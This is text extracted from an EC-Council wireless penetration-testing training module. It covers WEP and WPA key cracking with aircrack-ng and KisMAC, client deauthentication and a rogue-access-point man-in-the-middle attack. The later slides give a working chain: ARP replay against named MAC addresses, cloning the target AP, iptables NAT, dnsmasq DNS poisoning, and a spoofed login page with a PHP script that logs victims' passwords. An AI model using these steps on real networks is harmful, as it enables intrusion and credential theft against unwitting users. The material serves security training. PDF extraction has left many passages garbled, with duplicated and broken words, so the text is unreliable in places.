AirCrack-ng:Crack WEPCrack WEP
To crack WEP, start by opening a console window. On the command line, To crack WEP, start by opening a console window. On the command line, launch AirCrack-ng using the following syntax:
•aircrack-ng –a 1 filename.cap
You can specify multiple input files (either in .cap or .ivs format).
You can run both airodump-ng and aircrack-ng at the same time: aircrack-ng will auto-update when new IVs are available.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
AirCrack-ng:Available OptionsAvailable Options
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
AirCrack-ng:Usage ExamplesUsage Examples
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
AirCrack-ng: Cracking WPA/WPA2 PassphrasesWPA/WPA2 Passphrases
aircrack-ng -w password.lst *.capWhere: Where:
-w password.lst is the name of the password file. Remember to specify the full path if the file is not located in the same directory.*.cap is the name of a group of files containing the ivs.p g p g
You can use wildcard * to include multiple files.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
AirCrack-ng: Cracking WPA/ WPA2 Passphrases (cont’d)WPA2 Passphrases (cont d)
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
AirCrack-ng: Notes
Don’t try to crack the WEP key until you have 200,000 IVs or more.y y y ,
If you start too early, aircrack tends to spend too much time brute forcing keys and not properly applying the statistical techniques.p p y pp y g q
Start by trying 64 bit keys “aircrack-ng -n 64 captured-data.cap”.
If they are using a 64 bit WEP, it can usually be cracked in less then 5 minutes (generally less then 60 seconds) with relatively few IVs.
If you know the start of the WEP key in hexadecimal, you can enter it with the “-d” parameter.
L t k th WEP k i “ 6 8 ” i h d i l th
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Let us assume you know the WEP key is “0123456789” in hexadecimal, then you could use “-d 01” or “-d 0123”, etc.
Determining Network Topology: Network ViewNetwork View
Once you’ve gained access to the actual wireless y gnetwork, it helps to know the network topology, including the names of other computers and the devices on the network.
Network View is a small program that is designed to locate network devices and routes using TCP/IP, DNS, SNMP i N BIOS d Wi d SNMP, port scanning, NetBIOS, and Windows Management Interface.
NetworkView will scan a complete 128-node Class C network in just a few minutes.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Network View
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
WarDriving and Wireless Penetration Testing with OS XPenetration Testing with OS X
Apple OS X, WarDriving and Wireless Local Area Network (WLAN) i i h ll i l d l l penetration testing have excellent wireless support and several tools to
make these tasks easy.
• KisMAC is aWarDriving and WLAN discovery and penetration testing tool available on any platform and is available for free at
WarDriving with KisMAC:
testing tool available on any platform, and is available for free at http://kismac.binaervarianz.de/
• Most WarDriving applications provide the capability to discover networks in either active mode or passive mode; KisMAC provides both.
• KisMAC is unique because it also includes the functionality that a penetration tester needs to attack and compromise found networks.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
KisMAC
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
KisMAC (cont’d)
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
KisMAC (cont’d)
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
KisMAC (cont’d)
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
KisMAC (cont’d)
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Using a GPS
Most GPS devices capable of National Marine Electronics Association (NMEA) output work with KisMACoutput, work with KisMAC.
Many of these devices are only available with serial cables.
In most cases, you will need to purchase a serial-to-USB adapter in order to connect your GPS to your Mac.
Most of these adapters come with drivers for OS X; thus, make sure that the one you purchase includes these drivers.
You may be able to use a USB GPS cable and eliminate the need for a USB-to-You may be able to use a USB GPS cable and eliminate the need for a USB-to-serial adapter.
The GPS Store sells these cables at: htt // th t /d t il ? d t id GL
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
http://www.thegpsstore.com/detail.asp?product_id=GL0997
Attacking WEP with KisMAC
Since you have determined that WEP is being used on your target wireless network, you now have to decide how you want to crack the key. KisMAC has three network, you now have to decide how you want to crack the key. KisMAC has three primary methods of WEP cracking built in:
• Wordlist attacks.• Weak scheduling attacks.• Bruteforce attacks.
To use one of these attacks, you have to generate enough initialization vectors (IVs) for the attack to work.
The easiest way to do this is by reinjecting traffic, which is usually accomplished by capturing an Address Resolution Protocol (ARP) packet, spoofing the sender, and
di i b k h isending it back to the access point.
This generates a large amount of traffic that can then be captured and decoded.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Deauthenticating Clients
h l h lDeauthenticating clients with KisMAC is simple.
Before you can begin deauthenticating, you must lock KisMAC to the specific channel that your target network is using.
If KisMAC is successful in its attempt to deauthenticate, the dialog changes to note the BSSID of the access point it is deauthenticating BSSID of the access point it is deauthenticating.
During the time the deauthentication is occurring,
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
clients cannot use the wireless network.
Attacking WPA withKisMACKisMAC
Unlike WEP, which requires a large amount of traffic be generated in order to crack the key, cracking WPA only requires that you capture the four-way Extensible Authentication Protocol Over Local Area Network only requires that you capture the four way Extensible Authentication Protocol Over Local Area Network (EAPOL) handshake at authentication.
Unlike cracking WEP, the WPA attack is an offline dictionary attack, which means that when you use KisMAC to crack a WPA pre-shared key (or passphrase), you only need to capture a small amount of traffic; p y ( p p ), y y p ;the actual attack can be carried out later, even when you are out of range of the access point.
To attempt a dictionary attack against KisMAC, you may need to deauthenticate clients.
When attempting dictionary attacks against WPA, everything can be done from one host, which will cause the client to disassociate from the network and force them to reconnectthe client to disassociate from the network and force them to reconnect.
This requires the four-way EAPOL handshake to be transmitted again.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Attacking WPA with KisMAC (cont’d)KisMAC (cont d)
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Brute-Force Attacks Against 40-bit WEP40 bit WEP
KisMAC includes functionality to perform y pBruteforce attacks against 40-bit WEP keys.
There are four ways KisMAC can accomplish this:
• All possible charactersAl h i h l• Alphanumeric characters only
• Lowercase letters only• Newshams 21-bit attack
Each of these attacks is very effective, but also very time and processor intensive.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Wordlist Attacks
KisMAC provides the functionality to perform many types of dl k dd kwordlist attacks in addition to WPA attacks.
Cisco developed the Lightweight Extensible Authentication Protocol (LEAP) to help organizations concerned about Protocol (LEAP) to help organizations concerned about vulnerabilities in WEP.
LEAP is also vulnerable to wordlist attacks similar to WPALEAP is also vulnerable to wordlist attacks similar to WPA.
Ki MAC f dli t tt k i t LEAPKisMAC can perform wordlist attacks against LEAP.
Wordlist attacks can be launched against 40- and 104-bit
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Apple keys or 104-bit Message Digest 5 (MD5) keys in the same manner.
Mapping WarDrives with StumbVerterStumbVerter
StumbVerter takes input data from NetStumbler and plots the access i t f d Mi ft M P i t points found on Microsoft MapPoint maps.
The logged WAPs will be shown with small icons their color and shape The logged WAPs will be shown with small icons, their color and shape relating to WEP mode and signal strength.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
StumbVerter
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
MITM Attack
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
MITM Attack Design
A basic MITM attack connects a wireless client to a client’s (victim’s) access, and then forwards the traffic to the real (authorized) AP.
Components required:
The target—AP(s):
• To successfully perform a MITM attack, an attacker needs one or more target APs.
The target—AP(s):
The victim—wireless client(s):
• Wireless clients or the victim(s) of the MITM attack have an initial wireless connection to the target AP.• During the MITM attack, we will disconnect the victim from the target AP and have them associate to
the MITM AP.
( )
• The MITM attack platform provides access point functionality for wireless client(s) that were originally connected to a target AP.
h k l f f d h l d l h h l
The MITM attack platform:
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
• The MITM attack platform is configured with almost identical settings as the target AP, so that a client cannot tell the difference between the attacker’s access point and the real (authorized) access point.
MITM Attack Design (cont’d)
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
MITM Attack Variables
To successfully perform a MITM attack against a wireless network, a few variables i t lcome into play.
The first variable is how the target AP is configured; specifically, what security features are enabled on the access point to prevent unauthorized access.features are enabled on the access point to prevent unauthorized access.
Before an attack can begin, the following tasks must be accomplished:
• Locate one or more AP(s) with wireless clients already attached.• Identify the security controls and encryption scheme enabled on the target access point.• Circumvent the security controls and associate to the target access point.
To establish connectivity and forward client traffic back to the target wireless network, you must be able to circumvent the security controls of the target AP.
If ’t d thi ’t f d th li t’ t ffi b k t th t t
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
If you can’t do this, you can’t forward the client’s traffic back to the target access point.
Hardware for the Attack:Antennas, Amps, and WiFi Cardste as, ps, a d W Ca ds
To successfully perform a MITM attack, you need several pieces of hardware and a few key software programs.
A typical MITM attack platform utilizes the f ll i h d
• A laptop computer with two personal computer memory cards.• International Association (PCMCIA) slots
following hardware components:
• International Association (PCMCIA) slots.• Two wireless Network Interface Cards (NICs).• An external antenna (omni-directional preferred).• A bi-directional amplifier (optional).p ( p )• Pigtails to connect the external antennae to the amplifier and
wireless NIC.• A handheld global positioning system (GPS) unit (optional).
A i
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
• A power inverter.
Hardware for the Attack:Antennas, Amps, and WiFi Cardste as, ps, a d W Ca ds
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Laptop
A laptop computer with two PC card (PCMCIA) slots or one d l d l d f hPCMCIA card slot and one mini-PCI slot, is required for the
two wireless network cards.
The laptop serves as a clone of the target AP and provides connectivity back to the target wireless network.
The platform also runs a web server to host any spoofed websites discovered during an attack.
Therefore, the laptop should be well equipped to handle
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
memory-intensive tasks.
Wireless Network Cards
Two wireless network cards are required for an attack Two wireless network cards are required for an attack platform.
One wireless card provides access point functionality for wireless client(s) (victims), and must be able to go into Host AP mode (also known as master mode).
The second wireless card provides connectivity to the target AP and can be any 802 11 Border Gateway target AP, and can be any 802.11 Border Gateway (B/G) card supported by Linux.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Wireless Card Interfaces for the Attack PlatformAttack Platform
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Choosing the Right Antenna
Wireless connectivity to the target AP and the wireless client(s) is essential in order for this attack to work.
You need to have a strong wireless signal broadcasting from the Host AP access point.
Therefore, choosing the right antenna is important.
There are two main types of antennas to consider for this attack: directional and omni-directional
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
this attack: directional and omni-directional antennas.
Amplifying the Wireless Signal
A 2.4 gigahertz (GHz) amplifier is designed to extend the range of a 2.4 GHz radio 4 g g ( ) p g g 4device or a AP.
The amplifier is used in conjunction with an antenna to boost the signal of your MITM access point.
The intent is for the wireless signal access point to be stronger than the wireless signal of the target access point.
A typical amplifier has two connectors; depending on the connector type, one connection is made to the SENAO wireless card using a Multimedia Communications Exchange (MMCX) to N-Male pigtail, and the other connects to
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
g ( ) p g ,the omni-directional antenna.
Signal Strength
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Identify and Compromisethe Target Access Pointthe Target Access Point
Before you can mount the MITM attack, you need to identify and compromise the target AP.
To gather preliminary data on the target, you need to go back to WarDriving basics and gain as much information about the target as you can.
Example:
•VisitorLAN
Target network Service Set Identifier (SSID):
Target network Basic Service Set Identifier (BSSID):
•00:13:10:1E:65:42
Target network Basic Service Set Identifier (BSSID):
•00:02:2D:2D:82:36
Wireless client connected:
00:02:2D:2D:82:36
• WEP
The target network encryption:
Th t t t k IP
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
•192.168.1.0/24
The target network IP range:
Compromising the Target
Y h id tifi d t t i t h t f You have identified a target access point; however, to perform your MITM attack you need to connect to the access point, and to do this you need to compromise the WEP key.
To crack the WEP key, you need to know the BSSID of the access point and the Media Access Control (MAC) address of a wireless client already connected.y
Using the Aircrack-ng tools, you can begin the attack against the visiting LAN access pointvisiting LAN access point.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Crack the WEP key
i d h l i f d To start airodump-ng on the wlan0 interface and capture any IVs called visitorlan-01.cap to an output file, use the following command:
He..he..i got the key to
decrypt
• airodump-ng -w visitorlan -c 6 wlan0
Once airodump-ng is running, open a new terminal and t t i l ith th f ll i dstart aireplay-ng with the following command:
aireplay-ng --arpreplay -baireplay ng arpreplay b 00:13:10:1E:65:42 -m 68 -n 68 -dff:ff:ff:ff:ff:ff -h 00:02:2D:2D:82:36 wlan
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Aircrack-ng Cracked the WEP KeyWEP Key
Now you have all of the information required to connect to the target access point and begin your MITM attackaccess point and begin your MITM attack.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
The MITM Attack Laptop ConfigurationConfiguration
Connecting to the target network:
• The wireless interface wlan0 is the internal mini-PCI card, which provides the connection to the target wireless network.
Using a series of commands, you can set up the wireless connection to connect to the target access point:
ifconfig wlan0 down
iwconfig wlan0 mode Managed ap 00:13:10:1E:65:42
iwconfig wlan0 key 6D617474686577303232333036
ifconfig wlan0 up
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
dhcpcd wlan0
The MITM Attack Laptop Configuration (cont’d)Configuration (cont d)
wlan1 - Setting up the AP:
The second wireless card (i.e., wlan1) is the PCMCIA SENAO card, which acts as the Host AP access point. Configure the wlan1 interface to be an access point using the following commands:b p g g
ifconfig wlan1 downiwconfig wlan1 mode Master essid VisitorLANVisitorLANiwconfig wlan1 key 6D617474686577303232333036ifconfig wlan1 192.168.10.1 netmask 255.255.255.0ifconfig wlan1 up
At this point the MITM access point is configured on the wlan1
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
At this point, the MITM access point is configured on the wlan1 interface using the same settings as the target AP.
IP Forwarding and NAT using IPtablesusing IPtables
You will need to enable IP forwarding and NAT, ultimately creating a wireless You will need to enable IP forwarding and NAT, ultimately creating a wireless router/gateway.
IP forwarding provides the ability to have both wireless interfaces communicate and pass IP forwarding provides the ability to have both wireless interfaces communicate and pass traffic to each other.
NAT allows us to translate the IP addresses used on one network (wlan0-192.168.1.x) to an NAT allows us to translate the IP addresses used on one network (wlan0 192.168.1.x) to an IP address on another network (wlan1-192.168.10.x).
On the MITM attack laptop, the network associated to the wlan1 interface is the internal p p,network, and the network associated to the wlan0 interface is the outside network.
When a client from the internal network (wlan1) connects to an IP located in the outside network (wlan0) the destination addresses are updated as they pass through the attack
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
network (wlan0) the destination addresses are updated as they pass through the attack system.
Installing IPtables andIP ForwardingIP Forwarding
IPtables is the command line program used to configure the packet IPtables is the command-line program used to configure the packet filtering rule sets and NAT.
Start the IPtables service using the following command:
• /etc/init.d/iptables start/ / / p
Next, enable IP forwarding by editing the /etc/sysctl.conf file and changing the net.pv4.ip_forward variable from 0 to 1.g g p 4 p
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
/etc/sysctl.conf file
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Establishing the NAT Rules
You know the IP address of the target access point is 192.168.1.0/24, and you established your IP address to be on the 192.168.10.0/24 network. The following
d d f lcommands define NAT rules:
Flush the current rules:
iptables -Fpiptables -t nat -F
Flush the current rules:
i t bl A FORWARD i l 0iptables -A FORWARD -i wlan0 -s 192.168.1.0/255.255.255.0 -j ACCEPT
iptables -A FORWARD -i wlan1 -s 192.168.10.0/255.255.255.0 -j ACCEPTi t bl t t A POSTROUTING l 0 jiptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
After the rules have been defined, save with the following command:
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
/etc/init.d/iptables save
Establishing IPtable NAT Rules (cont’d)(cont d)
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Dnsmasq
D i li ht i ht il fi d D i N S t Dnsmasq is a lightweight, easily configured Domain Name System (DNS) forwarder and Dynamic Host Configuration Protocol (DHCP) server.
It serves two important functions on your attack platform: provides IP addresses to the wireless clients connecting to your access point, and gives us the ability to monitor and poison DNS queries.g y p q
This tool is very useful when redirecting the DNS requests for web applications to your spoofed web serverapplications to your spoofed web server.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Configuring Dnsmasq
Configuring Dnsmasq is reasonably simple
The program has many options, but you only need to edit a few lines to get it up and running
Edit the Dnsmasq configuration file located at /etc/dnsmasq.conf:
After you configure Dnsmasq, start it with the following command:
•/etc/init.d/dnsmasq start
DHCP and DNS requests are logged in /var/log/messages
To monitor incoming DHCP requests, you can check the /var/log/messages file with the following command:
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
following command:
•grep dnsmasq /var/log/messages | grep –i dhcp
/etc/dnsmasq.conf
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Viewing DHCP Requests from a Dnsmasq Log Filefrom a Dnsmasq Log File
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Viewing DNS Queries from a Dnsmasq Log Filefrom a Dnsmasq Log File
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Airpwn
Airpwn is a supporting tool for 802.11 (wireless) packet injection.
It spoofs 802.11 packets to verify whether the access point is valid or not.
You can send the data to the AP (access point) and also get the reply from the AP while using a traditional 802.11 network.
The client will take Airpwn's packet and remove the APs by controlling the server-side communication through Airpwn because it is almost
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
the server-side communication through Airpwn because it is almost guaranteed to provide the packet before the AP.
Configuration Files
Airpwn configuration files are simple text files with one or more request/response blocks.
Request/response blocks start with the begin command followed by:Request/response blocks start with the begin command followed by:
• A match expression.• An optional ignore expression.• A response filename.
A single configuration file is transmitted to Airpwn and also to command line parameters while processing.p p g
Configuration includes one or more files and each file contains some standards.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Using Airpwn on WEP-Encrypted NetworksEncrypted Networks
Airpwn can decode WEP traffic and send a WEP-encrypted response.
Use Airpwn with a WEP-protected network by including the network’s key to the Airpwn command line through –k keystring option.
Include multiple keys to the Airpwn command by using the -k option number of times, as Airpwn works at the same time on multiple networks.
keystring frames the WEP key.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Airpwn: Scripting
Airpwn should be configured to return the dynamic response data from Airpwn should be configured to return the dynamic response data from Python script in place of static response files.
I i ’ h i ( i It can use script’s output as the request expression (pyscript pythonmodule)is appropriate in place of response.
It supports the airpwn_response function of your module containing an argument.
The airpwn_response function should retrieve with response data or else send “None”, if there is no response to send.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Apache Hypertext Preprocessor and Virtual Web Serversand Virtual Web Servers
Apache is a versatile and configurable web server that provides the ability Apache is a versatile and configurable web server that provides the ability to host spoofed web applications on the MITM attack laptop.
During the MITM attack, you will need to create a spoofed login page using Apache and PHP to capture user credentials.
Command to Apache:p
•/etc/init.d/apache2 start
During the MITM attack, spoof a web page and host it on your attack During the MITM attack, spoof a web page and host it on your attack platform.
In a real scenario, you might want to set up multiple websites to increase
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
the chance of capturing user credentials.
Virtual Directories
To host multiple instances or websites on your web server, you can create virtual web directories in the virtual web directories in the /etc/apache2/vhosts.d/00_default_vhost.conf file.
You can define multiple virtual directories in the You can define multiple virtual directories in the 00_default_vhost.conf file using the following command:
<VirtualHost 192.168.10.2:80>DocumentRoot "/var/www/localhost/htdocs/site1/"</VirtualHost><VirtualHost 192.168.10.3:80>D tR t "/ / /l lh t/htd / it 2/"DocumentRoot "/var/www/localhost/htdocs/site2/"</VirtualHost><VirtualHost 192.168.10.4:80>DocumentRoot "/var/www/localhost/htdocs/site3/"
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
</VirtualHost>
Virtual Directories (cont’d)
In the previous slide, each virtual host has a separate IP address defined for each site.
In order for this to work properly, you need to define virtual interfaces for each IP address using the following commands:g g
ifconfig wlan1:0 192.168.10.2 netmask 255.255.255.0ifconfig wlan1:1 192.168.10.3 netmask 255.255.255.0gifconfig wlan1:2 192.168.10.4 netmask 255.255.255.0
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Clone the Target Access Point and Begin the AttackPoint and Begin the Attack
O fi i h d ith th fi ti f MITM Once you are finished with the configuration of your MITM attack laptop, you can establish your wireless connections and begin the attack.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Start the Wireless Interface
After you are done configuring the wireless file you can start the wireless After you are done configuring the wireless file, you can start the wireless interfaces and establish your wireless network connections.
Establish the connection to your target wireless
•/etc/init.d/net.wlan0 start
Establish the connection to your target wireless network using the command:
/etc/init.d/net.wlan0 start
Next, start your other wireless interface (wan1) using the command:
•/etc/init.d/net.wlan1 start
using the command:
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Start the Wireless Interfaces (cont’d)(cont d)
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Deauthenticate ClientsConnected to the Target Access PointConnected to the Target Access Point
To get the victim wireless clients to connect to your access point, you can wait il h di d f h until they disconnect and reconnect, or you can force them to reconnect.
To force the clients off the target wireless network, you can de-authenticate them from the target access point using another computer.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Wait for the Client toAssociate to Your Access PointAssociate to Your Access Point
If all goes well and the signal strength of your access point is stronger than the target k i h ld h i l li i networks access point, you should see the wireless client connect to your access point.
When a wireless client associates to your access point, you need to assign it an IP address.
Dnsmasq will provide an IP address to the client using the DHCP allocations defined in the /etc/dnsmasq.conf file.
The client will use the IP address of your access point as the gateway and primary DNS
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
y p g y p yserver.
Spoof the Application
The goal of the spoofed application is to have the user log in to your web page instead of the real (authorized) one
This won’t be difficult, if the site is not using SSL and is using a form-based authentication
real (authorized) one.
A quick and easy way to spoof the site is to download the target web page using wget and
page.
A quick and easy way to spoof the site is to download the target web page using wget and modify the source.
wget -r http://192.168.1.30
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Once you have all the files associated with the web page, you need to modify the source HTML and add some extra code to capture the username and password form variables.
Modify the Page
When you edit the index.html file using our favorite text y geditor, you should change the content of the page so that it looks the same to the user.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Example Page
<h1>Intranet Login</h1><form action='login php' method="post"><form action= login.php method= post ><table border=0><tr><td>Username:</td><td><input type=text name="username" size=30></td></tr><tr><td>
dPassword:</td><td><input type="password" name="password" size=30></td></tr></td></tr></table><input type="submit" value="Submit"></form>
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
</body></html>
Example Page (cont’d)
Now that you know the names of the form variables the method and the Now that you know the names of the form variables, the method, and the action, you can create your own backend login.php page.
Using a simple PHP page, capture the user credentials and redirect the client back to the original source of the web page.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Login/php page
<?php$username = $ POST['username'];$username $_POST[ username ];$password = $_POST['password'];$log='/var/log/apache2/captured.txt';$ $ $$user_info=("Username:$username Password:$password" .
"\n");{$fp=fopen($log,"a");fwrite($fp, $user_info);fclose($fp);($ p);}$URL=("http://192.168.1.30");header ("Location: $URL");
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
header ("Location: $URL");?>
Redirect Web Traffic Using DnsmasqDnsmasq
Once your fake login page is functional, you can poison the client’s DNS traffic to y g p g , y predirect any queries to your malicious login page.
To do this, you can modify the address variable of your Dnsmasq configuration file To do this, you can modify the address variable of your Dnsmasq configuration file to add the DNS name of your target and the IP address of your web server.
• address=/login.intranet/192.168.10.1
Once you update the address variable, you have to restart the Dnsmasq service to enable the changes:
• /etc/init d/dnsmasq restart• /etc/init.d/dnsmasq restart
At this point, if a client connected to your access point makes a request for the login.intranet web page, the IP address will resolve to your web server, which is hosting the spoofed login page.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
g p g p g
Summary
In this module we reviewed advanced techniques for wireless penetration In this module, we reviewed advanced techniques for wireless penetration testing.
We have discussed various wireless concepts such as its components and standards.
We have reviewed Wired Equivalent Privacy (WEP), its issues, flaws, and securitysecurity.
We have discussed various wireless security technologies such as WPA, EAP, and TKIP.
We have discussed different attacks and tools such as War Driving, Netstumbler, and MITM attacks.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
top related